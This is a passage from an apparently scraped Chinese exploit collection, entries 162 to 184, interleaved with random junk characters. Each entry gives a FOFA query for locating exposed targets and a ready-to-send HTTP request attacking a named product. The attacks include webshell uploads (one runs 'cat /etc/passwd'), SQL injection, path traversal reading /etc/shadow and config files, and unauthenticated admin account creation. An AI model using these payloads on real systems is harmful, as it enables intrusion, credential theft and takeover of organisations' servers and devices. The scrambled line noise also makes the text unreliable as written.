* X/ k! S( ~ I- {* ?# r<UploadResume xmlns="http://tempuri.org/">7 c9 N8 \. Z9 V3 W2 F2 Q4 q
<ip>1</ip>
* x8 K y- R5 Y: E# A% I% ^8 f* j<fileName>../../../../dizxdell.aspx</fileName>
5 Q0 M, o" Q8 j, v8 t9 w+ i<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>: w: `( s, \1 `' B' y, A
<tag>3</tag>
* @, m9 C# B ?% u0 w</UploadResume>8 s7 C8 F2 H6 B4 ^$ k( O W
</soap:Body>$ E3 `+ u( H) U) ~1 Y
</soap:Envelope>7 Z7 m' {( C2 L
9 c5 t8 j2 ?( C
7 ]2 a2 _0 G+ e# ~http://x.x.x.x/dizxdell.aspx
6 A! f$ L- F0 u+ s1 s6 d U. I
8 I( {' ^7 L7 R! k! C1 S162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传' x1 r) }1 n: o+ D) G: Q
FOFA: app="和丰山海-数字标牌"6 }: n6 c& E) a) n; x! e
POST /QH.aspx HTTP/1.1" Y ~% _$ K" A. t. R
Host: x.x.x.x
; N. x) G7 L0 O4 z+ e6 x1 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0' ]+ o7 c- d- f
Connection: close/ c/ r8 t2 L) L8 c
Content-Length: 583
$ d3 t- F1 w5 RContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
2 |$ f3 o! Y# \# T% B9 VAccept-Encoding: gzip
# R1 t8 t1 N2 B' F
; g8 r+ n' z2 u% J! P' G------WebKitFormBoundaryeegvclmyurlotuey
* _% M& O* C p* g; T5 TContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
( S- [, ?0 n7 T, A( I6 n% GContent-Type: application/octet-stream
) S0 e! u! w V+ ^$ n |" \. a, h# C$ J( m/ o& m; h4 f0 t. E
<% response.write("ujidwqfuuqjalgkvrpqy") %>0 d1 t6 T+ l/ |; d; y3 [: s
------WebKitFormBoundaryeegvclmyurlotuey% p9 t; ? B, M2 R o9 }
Content-Disposition: form-data; name="action"
) f) z& f" @7 q+ y/ q2 A3 k
: B8 r/ Q, P3 ], V) s( Lupload: H- v: }1 {6 F1 o( _; A: q( n
------WebKitFormBoundaryeegvclmyurlotuey8 w' O. ?! e$ I2 J/ J! Y# i. R
Content-Disposition: form-data; name="responderId"% ^' r& }2 L) \ i& w4 O+ ~
( S1 k/ A' I# [ResourceNewResponder" Y7 O! a& ?* x9 h; O' Z
------WebKitFormBoundaryeegvclmyurlotuey) z& p L2 D0 [% P$ `: h& L/ i
Content-Disposition: form-data; name="remotePath"$ F6 F- L: b( g. ]: @3 S) U
4 h$ B2 | J$ {/ y
/opt/resources6 e1 n) c: L6 e1 m7 e$ ]. [. F( A
------WebKitFormBoundaryeegvclmyurlotuey--
0 ?5 F# T7 }5 |: E
7 E5 Z5 z9 {3 Q/ T7 Y6 _- _" [2 K7 d. |: }) h$ ]. \- l
http://x.x.x.x/opt/resources/kjuhitjgk.aspx2 Y1 R* x! j: i
& A' `% ^/ y/ a0 x# E2 e
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
. w6 H9 G8 j- R& [FOFA: icon_hash="-795291075"
! j+ d7 w- I- F5 \POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1* }3 `: W; H6 V% R9 ~- X( c
Host: x.x.x.x
E+ T3 g/ Z3 S( T% h) r% k: sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36( f: E. D6 O* y8 g% ~6 Q# B! ?
Connection: close
9 G1 ^0 l& B8 P' n! R: G0 a* a- C( T4 @Content-Length: 2937 ?& F9 F" v; S5 n% j8 T8 Z% D
Accept: */*: A, |, q5 v3 x* c7 H
Accept-Encoding: gzip, deflate
7 v8 q4 q* `& B" P) ?Accept-Language: zh-CN,zh;q=0.9
5 b- W3 I+ }" [1 _Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
! q/ U" U9 U5 l* r' L) u2 x5 M. L) n. A5 [- S- h6 W
------iiqvnofupvhdyrcoqyuujyetjvqgocod. l& ?8 L/ r D0 w, e0 Q+ s
Content-Disposition: form-data; name="name"
q, s; n. C$ y: E) ^
& i' g9 @% V# i+ m d: D1.php4 F6 M1 ~5 A% k. p1 K0 b) ]. {
------iiqvnofupvhdyrcoqyuujyetjvqgocod
' k; e! R. F* o# N) DContent-Disposition: form-data; name="upfile"; filename="1.php" J- i. L$ \) p! O( b/ N
Content-Type: image/jpeg
d1 i# ]# G) Y9 s
. R! C& P% l4 z- [1 Jrvjhvbhwwuooyiioxega
% J6 _$ |) d o# M------iiqvnofupvhdyrcoqyuujyetjvqgocod--7 y0 n, r) \( m8 c: f
0 s0 b- ]5 I. l l/ R/ H. b$ M3 r9 X7 X' |4 ^# C
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传; q. |4 H' L+ q+ B
FOFA: title="智慧综合管理平台登入"2 s3 d h- A: \+ R7 x0 I1 d
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
; J6 {+ p& @# z, g9 QHost: x.x.x.x
5 |5 ~$ e' t. l/ e+ w- H0 FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
7 I; Y% m/ J! r% rContent-Length: 288
_( J3 ?0 ]- C. f3 eAccept: application/json, text/javascript, */*; q=0.01# _3 O$ U3 q# w2 c8 Y
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,
& v4 F6 d' H. e7 IConnection: close
) D( \ f# N! B7 M; D' wContent-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
9 {% s8 n( k5 s0 [# Q6 mX-Requested-With: XMLHttpRequest' N% i/ B' v2 ^9 A3 o$ K
Accept-Encoding: gzip( F2 x+ K" N$ ]$ p4 f
, v9 @0 D- N/ F. k& M3 [0 ~------dqdaieopnozbkapjacdbdthlvtlyl
7 W+ r8 ?! i q6 I) s) D2 JContent-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
/ [( Y% o9 [+ B$ a+ n' [* GContent-Type: image/jpeg
2 c+ N; [7 c& v1 L! P s+ T3 I
* v3 d# l( p' [: }+ e- m& S<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
4 e/ I5 ~6 c) j7 B6 E7 @, y------dqdaieopnozbkapjacdbdthlvtlyl--
" ~% I# i: U/ f) F
, T# c T6 R" _# I: m
" k& \9 m0 ]) y) lhttp://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx
" o/ d9 Q9 v- i0 A& K& }! N: j' a" {( S0 g9 B, F
165. OrangeHRM 3.3.3 SQL 注入
8 v) \. D9 Z/ ?7 t# U2 X5 JCVE-2024-36428% u/ G' k* f& b4 S
FOFA: app="OrangeHRM-产品"
' F+ c' C+ y) ?( G1 R3 x# p6 QURL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
: T8 }; a* m2 F+ M
$ }+ H+ t1 x( j2 j. x+ p3 P$ ^5 Q w( o9 l
166. 中成科信票务管理平台SeatMapHandler SQL注入
6 W1 _) @6 z6 ^* C, \: M3 N& T' xFOFA:body="技术支持:北京中成科信科技发展有限公司"3 m" F% F$ ^' K/ R Y4 f9 _& z
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1. S: a; W( `0 J/ k2 E7 q7 l: a; Y
Host:: F5 B$ h, | B5 s4 u9 w5 m
Pragma: no-cache
, \7 h. m5 n9 H4 y. u3 ]1 Y, a FCache-Control: no-cache# l, M' @! }9 c3 j- _) Q6 }4 j# c
Upgrade-Insecure-Requests: 12 }. z0 C% a2 ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36! _" r6 z$ P0 C, N! C6 }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ i( G/ z; a* `+ dAccept-Encoding: gzip, deflate: w0 ]- i4 S( t9 L3 ?/ I
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8' \8 p( O s" d
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
+ k# ]5 Z+ H) n( ]' nConnection: close2 ?5 k" ^( H8 A
Content-Type: application/x-www-form-urlencoded
3 |! r6 O1 O: P' Q t0 WContent-Length: 89 _1 S& K/ B' G; o1 X, G
/ i) R- M7 X" lMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
7 M, W0 I5 O9 u# K1 P$ K- j- X/ H1 [! }: ~
/ J; t# m% q/ ], V167. 精益价值管理系统 DownLoad.aspx任意文件读取
$ @( S7 E2 G& {7 x$ ^FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx", ~9 s% [* r: [
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
( h* `, A; M) ^1 L0 ?- pHost:7 g T3 r+ Y9 J$ Z! S6 [ A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
/ H6 _/ v* e7 }( \Content-Type: application/x-www-form-urlencoded8 ~: R3 h$ `# s. b+ ~
Accept-Encoding: gzip, deflate
3 i7 A7 v: s: y6 }; K2 ? zAccept: */*" r8 n+ h, g8 u# U$ }& H
Connection: keep-alive
1 n' M8 G W- a3 X3 c7 a% ~
( P! g8 G4 c9 A0 J, G/ @& A, f" f, I2 E6 F
168. 宏景EHR OutputCode 任意文件读取, T6 r* B, g+ S* o
FOFA:app="HJSOFT-HCM"
" N0 i) o3 x4 t. w9 Q& TGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1- a: ~* z0 w& B1 s, y* i+ l
Host: your-ip4 p3 b) w& I+ ^" j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36( O4 ^2 W: U4 B8 w" K* L
Content-Type: application/x-www-form-urlencoded$ H* P( Y, [5 K8 g) X9 @) w
Connection: close; Z8 a2 H$ u" E9 K/ K; p8 m
9 T% p& o- q: D* I# w4 L4 G1 |8 y3 l7 q2 h1 ~
1 v G0 G' m z1 @
169. 宏景EHR downlawbase SQL注入9 z4 D. l( D$ x4 `, v5 R4 W
FOFA:app="HJSOFT-HCM"; [ P/ _! O9 w% I* |
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.14 V* b# J( C9 _: m/ O, i' x
Host: your-ip+ A. S- _; z- X2 k7 J ?
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36' l0 _! w F+ ?' ^+ r1 K% o6 J* v* t
Accept: */*
$ Z! Y7 I8 l* B! BAccept-Encoding: gzip, deflate
/ f. t- z0 I9 d% ^: U# m( \Connection: close+ d9 x u5 D9 u6 s
) Q0 F% b6 e9 C" e8 H
* {6 c; Z) Z# H) p( [# E7 ^8 N6 H, O- m, G
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
( l* u7 d6 {6 l8 B0 yFOFA:body="/general/sys/hjaxmanage.js"8 t6 Y2 b6 m% `0 i
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1- N) R) j6 q" U1 u! T
Host: balalanengliang
+ C1 C( g4 x% S9 s# s NUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, j! O+ l2 S; [Content-Type: application/x-www-form-urlencoded7 n7 A. Q- }' p8 W0 V/ p
! B1 Q+ U! I/ _filename=../webapps/ROOT/WEB-INF/web.xml
3 s& n+ O# n6 S) q9 A0 M, _3 R) U; P, z* y* K
3 j. Q3 i$ e" k171. 通天星CMSV6车载定位监控平台 SQL注入
9 [6 t8 a& f8 O6 M( D7 m: o) k5 }4 x; qFOFA:body="/808gps/"
8 `0 e+ C+ D) v( ^' A8 AGET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
: @2 U* M7 }4 M. k2 d1 G% p& d- b; JHost: your-ip. d: m8 I' G7 {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
- I' L3 {+ l1 s9 x3 `, Q7 XAccept: */*! l( G0 w3 Z- D* k9 h9 s% V
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% @& K9 B* Z4 L, j, l. }1 W2 c3 u4 l
Accept-Encoding: gzip, deflate" N9 q& ^' F3 {! c' `
Connection: close; H- f1 ~5 l+ Z: s, ^
& m4 s9 V# \- y1 m% C6 w0 k( \4 S9 j, j7 Y# O- m
6 \6 O" R1 C" |+ d
172. DT-高清车牌识别摄像机任意文件读取% N$ W, f; b6 V" S+ b* Q
FOFA:app="DT-高清车牌识别摄像机"
' `# H9 I/ J: VGET /../../../../etc/passwd HTTP/1.1
% D. n" n8 |/ @7 k3 X, @6 BHost: your-ip
. X3 s3 s' w3 T: _8 ^! R3 Y2 LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.361 j4 A# I1 p( C. N& s
Accept-Encoding: gzip, deflate
- C' q3 Z9 r7 h- E' J- ]$ H! u+ r& \. _Accept: */*
; ^: g& k; m6 s) h4 d0 X& h; X( AConnection: keep-alive( g8 e% a* x2 ^. s4 x, J( k
# v+ Y/ H: G; h* T$ `7 |7 e
$ {9 r+ e r% k. ]
0 Q: E! R6 j3 _! X, {( r% e" |173. Check Point 安全网关任意文件读取
" ~& n; O2 V4 sCVE-2024-24919
% f( _3 D8 G) p: P9 b& X( z5 b) dFOFA:app="Check_Point-SSL-Network-Extender", \1 l, |# ]' a L+ `
POST /clients/MyCRL HTTP/1.1
; n8 P( O: W3 D! ?7 xHost: your-ip
6 b2 }( K3 d! K ?0 a+ E- p, i! [Content-Type: application/x-www-form-urlencoded5 L: Z1 L( s) I$ @3 U
, S6 }% \" B8 J' ]" K _ paCSHELL/../../../../../../../etc/shadow. J0 }# g- F w" z
4 ?! ?4 u* {, W3 M& t" ]# M0 ?- v# E. c
/ h* I) S, G( n2 ?9 F" f174. 金和OA C6 FileDownLoad.aspx 任意文件读取# }, |3 A0 z# p( @1 A
FOFA:app="金和网络-金和OA"5 w8 Y, C4 [( _- l: o2 a& K5 [
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.17 A8 Q8 _1 u' Z6 C% M/ O) a: d
Host: your-ip$ |7 Q8 \5 O5 V; F7 U% K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36& x, t7 Z; `5 d& J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ V/ R) @ ]) f; L$ d+ J# }& K
Accept-Encoding: gzip, deflate, br6 G5 N9 x% ]' u2 v2 h% @/ u I
Accept-Language: zh-CN,zh;q=0.9
4 [) u" z* c u8 q9 A, u' v ?Connection: close/ V* E H w5 \- l5 T8 A5 |
; T$ e3 L) Y4 G D5 r. M/ U7 Q( H0 y9 g% e! \. b
/ X0 Y& t) O" G175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入3 d. ]! K3 s5 n9 L$ a
FOFA:app="金和网络-金和OA"5 C2 m) V0 P X) s5 D m2 ]
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
% i. y2 m' }! X3 j' uHost:
9 V4 w! A* O8 l* } WUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
* `9 q+ d B5 o \% kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& \# s: @8 K$ `3 u* }/ DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, U3 z! Y! @, I1 `; zAccept-Encoding: gzip, deflate
3 T- n# ~! Q, g! {8 q4 IConnection: close
. p. ^0 j7 [1 n" @2 b0 }Upgrade-Insecure-Requests: 1) M2 G( N% \4 a9 r: u5 f0 _/ V. a u
+ Q$ L! `# |* x3 P) Q
! i' @: J/ K. e3 r# i1 u2 ^
176. 电信网关配置管理系统 rewrite.php 文件上传
! m& U) b1 o8 @FOFA:body="img/login_bg3.png" && body="系统登录"# i0 ?1 K4 J: N( T% q
POST /manager/teletext/material/rewrite.php HTTP/1.10 S( Y4 b2 o" U" E! ^4 N4 E' `
Host: your-ip6 A& a8 `. \1 n8 F' Z) X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
4 t( ?( O6 x0 s0 r+ KContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT' c( l# y1 F9 S7 c7 T% w
Connection: close) G4 } G$ p. A/ g3 P
3 B. B- ?) \8 i1 t: n8 S$ m" u
------WebKitFormBoundaryOKldnDPT
* l: g" Y: u& H* O i/ x+ UContent-Disposition: form-data; name="tmp_name"; filename="test.php"- ?" `0 g) v3 Y# g! }) J0 _
Content-Type: image/png7 r) Y: t- ~5 D. ~' L- \# ]- X
2 ~3 W* |: q3 p' J2 k3 V& U; G<?php system("cat /etc/passwd");unlink(__FILE__);?>
, ~3 |) G3 @$ C! ^' n------WebKitFormBoundaryOKldnDPT
4 S: p5 X) B# Z! SContent-Disposition: form-data; name="uploadtime"; c6 g& s3 v( K
- Q; l# X1 f5 w( [5 v- P
3 k1 L4 R$ }: U; X ^8 _------WebKitFormBoundaryOKldnDPT--7 x2 Y/ \! C6 Y7 R0 {0 m
' u! c& m% g" e% \3 i/ b2 ]) N: ~2 L
( `1 I: ]8 c3 z2 B( w
0 p' b* g: X( I) T
177. H3C路由器敏感信息泄露* S9 _ x. y; T; _& @7 [9 H' h
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg7 I9 Y) x( f! e R. g
/userLogin.asp/../actionpolicy_status/../M60.cfg3 o$ h% @, y3 c9 `7 F4 K
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
! A4 ]4 f( p4 U/ t# m/userLogin.asp/../actionpolicy_status/../GR5200.cfg8 ~* D6 Y, {5 V* V0 N. O
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
' [) F6 _# q& k5 K/userLogin.asp/../actionpolicy_status/../GR2200.cfg# U' _' t3 j& G W2 y0 Z
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
0 Q: G; X' V, C- ~& L- ]4 u3 N* F/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg' G5 M, S8 ]8 `# g& u% C% F
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg9 W) h, n) [# K- D0 T; a% G
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
2 v/ h7 X( `+ G2 E* J* ?2 R/userLogin.asp/../actionpolicy_status/../ER5200.cfg8 s P* s/ `$ Q0 H
/userLogin.asp/../actionpolicy_status/../ER5100.cfg0 Y! G% L1 d; P9 I8 r1 \! u$ B5 |
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
' F) Z1 ^8 }- O) |" n6 d5 y; s/userLogin.asp/../actionpolicy_status/../ER3260.cfg# P0 y# O" g# D5 m% Y
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg4 j( [ u! B( X* u3 U+ {
/userLogin.asp/../actionpolicy_status/../ER3200.cfg# ~8 [$ f( h8 H) O: s5 ]1 }" f8 {
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
- T& }9 _$ ?# M& }8 U/userLogin.asp/../actionpolicy_status/../ER3108G.cfg$ F' t. G1 {0 O" E: b1 _% W
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
- k7 @! o% \9 s8 k7 j/userLogin.asp/../actionpolicy_status/../ER3100.cfg
( ^# x w+ Q" c% \' l" [/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg
0 a- W, @7 e( ?1 {. ~6 p! X
2 G9 ?8 p% M' F, W' y _1 F9 D( e/ v- [+ [2 Q. |3 o
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
1 I# k! E6 R+ G" \. k' a' \8 V5 r' cFOFA:header="/selfservice"
* g1 l6 l* i- J" Q/ }; ePOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.13 U5 B- ]1 y) P( T$ Z" M$ d' h/ w6 {
Host:
/ w7 [- S4 \) \% v2 k& t( U- vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36: P1 E. o$ B* p" U
Content-Length: 252
3 U( w) I5 [) v/ P9 M4 wAccept-Encoding: gzip, deflate/ Y0 L! t" Q% P4 I9 r- O
Connection: close/ g; L D0 j {' c
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
& {: d, q" @* W6 g-----------------aqutkea7vvanpqy3rh2l' g$ V6 E5 t H3 k$ ?* Z# V# ?
Content-Disposition: form-data; name="12234.txt"; filename="12234"
1 h" e g7 ^5 r2 F& h9 Z2 r/ A, iContent-Type: application/octet-stream. C1 Y9 |6 N4 P; ~ w( x6 [9 N( @
Content-Length: 255
" t0 J/ C# O& }. m0 d( I
$ E+ C3 u" q# Y1 c2 @' _( W12234
& u# C9 b* _5 S$ O }( o-----------------aqutkea7vvanpqy3rh2l--
7 X, J3 U% R% G2 B8 F' s$ S( o
7 Y! Y* Y8 G0 U( f2 A. [
/ K% s- Q0 v: `6 W AGET /imc/primepush/%2e%2e/flex/12234.txt
2 G7 q! F7 y n. x! d9 P2 I& T3 q" q* L O# {$ U' Y9 x- m/ P
+ B2 I; v, m- g, O& X. m1 {179. 建文工程管理系统存在任意文件读取
7 n6 K8 [* Q7 W( k5 M1 V* P( HPOST /Common/DownLoad2.aspx HTTP/1.1( F: ]7 q# u' `, y" u
Host: {{Hostname}}
( c6 e d+ h' ?" O, O% Y3 RContent-Type: application/x-www-form-urlencoded
/ W! Q# G$ M! ?- NUser-Agent: Mozilla/5.0. [" u5 u1 u$ R# `3 R
9 W' \ F8 r$ x& |2 p# W# d
path=../log4net.config&Name=# o1 o v8 z5 x2 a% r
# Z0 s5 V& l' A I: v
' z7 F7 h. ~- B. S( p; P
180. 帮管客 CRM jiliyu SQL注入
% b. }8 \: m+ rFOFA:app="帮管客-CRM"$ R$ Q% \/ Y8 y* L5 i
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
7 E( C; T2 c+ O! A8 }Host: your-ip0 D* k2 }# \2 B) Q6 i6 E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+ t( s2 K f0 p7 ~* z) C* A2 UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
& R9 ~& W6 I' j# nAccept-Encoding: gzip, deflate
0 v; u1 |. \/ o. D- z- u7 _% sAccept-Language: zh-CN,zh;q=0.9
5 ]2 Z' e) j- A& O, G3 IConnection: close
' G" S; @: j- t7 c2 P" L# |1 D" D9 P4 I) q- r; \
6 d8 F* \& n' l# N4 Z181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入1 @/ G0 B0 o" \% f: d" V) Q
FOFA:"PDCA/js/_publicCom.js"
1 \, @' j; A; B- r( I- Q: V, uPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
L, j, K/ p: c1 O# N- G2 zHost: your-ip( l( r- t; F+ l* E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36# u. `) h/ a7 [1 L7 U& z+ e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
: F: L; k# z% `$ o7 q1 EAccept-Encoding: gzip, deflate, br6 z3 U/ S: e3 x3 z4 O7 f) ?" J" Y3 o
Accept-Language: zh-CN,zh;q=0.9& ^! ~1 A F4 ]
Connection: close/ `/ O. p o$ R
Content-Type: application/x-www-form-urlencoded3 L7 P, K/ ?4 J7 R6 P; v
- c c0 _0 g" S) g: w& [5 S
& q1 G5 Q, q5 L1 k/ H- K/ n) G1 z) E
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
! n0 U$ k& B$ S3 \0 L( N
$ W- v7 P- v0 ]6 L# a
1 M- K- T. X- g9 @182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
! S$ S9 B' J7 x# [3 WFOFA:"PDCA/js/_publicCom.js", H- f2 {) B! Y2 L3 W: R4 l
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1+ h" W4 }+ y4 }+ P* h4 H7 m
Host: your-ip
K2 _5 S& N- O9 z3 T* R! PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36/ p# L) R/ B2 R; D) l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
5 x# I* t% e8 r+ H/ o! sAccept-Encoding: gzip, deflate, br
! C" c6 L) C" U3 y! x/ WAccept-Language: zh-CN,zh;q=0.9
O* w$ g) P+ qConnection: close' U% U( q- ^/ K
Content-Type: application/x-www-form-urlencoded" d# Y1 H" t$ D, \8 w; x
1 w/ _. r& `/ z0 @
, ?8 Q) x) o( H+ U2 G
username=test1234&pwd=test1234&savedays=1+ R2 i8 K4 G5 e( g; R# a
# B2 @* `# U# M! h* k9 N/ R+ C" i% D6 t4 E
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
3 F; x/ e( V" jFOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
. F, w1 ?- Y- uGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.16 H3 I5 Y a' b2 `8 C; r; B- e: H2 f
Host: your-ip
8 R% P, j- }7 K9 E. @User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36/ [/ \) {& e/ A% `# f+ Q$ p" M$ l
Accept-Charset: utf-8
; P5 b C; j8 C* c. \Accept-Encoding: gzip, deflate
1 }- W; T" L8 @/ H: H. hConnection: close
: {9 q4 Z5 b0 A0 V+ ?0 X" _! R0 R% o+ w% ?3 T; M, w$ R w, Y- c: N7 ~
3 L7 U3 h F% X* h9 M6 f
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
( W* Z8 n" F1 G, z* @FOFA:server="SunFull-Webs"
; A1 J: Q, O" s4 p( ^" ~POST /soap/AddUser HTTP/1.1
h7 [! \; K* X/ q! {8 `Host: your-ip! S1 w o9 h4 y
Accept-Encoding: gzip, deflate
% @, a7 E0 O# H' A7 W$ Q% g OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
( A5 ^8 Z' k9 |; h2 t6 T7 yAccept: application/xml, text/xml, */*; q=0.01
) M' [2 v, o, G1 E: Y7 CContent-Type: text/xml; charset=utf-8 [6 Q7 s; V) }& R; B% Y! d. B2 q
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 e. s7 ~% {4 S# F& S( E3 j
X-Requested-With: XMLHttpRequest+ i8 j* e9 B' s1 @3 k
, q& W3 G, I+ Q; B1 w
7 s+ W2 W6 b" F) ~/ `insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')
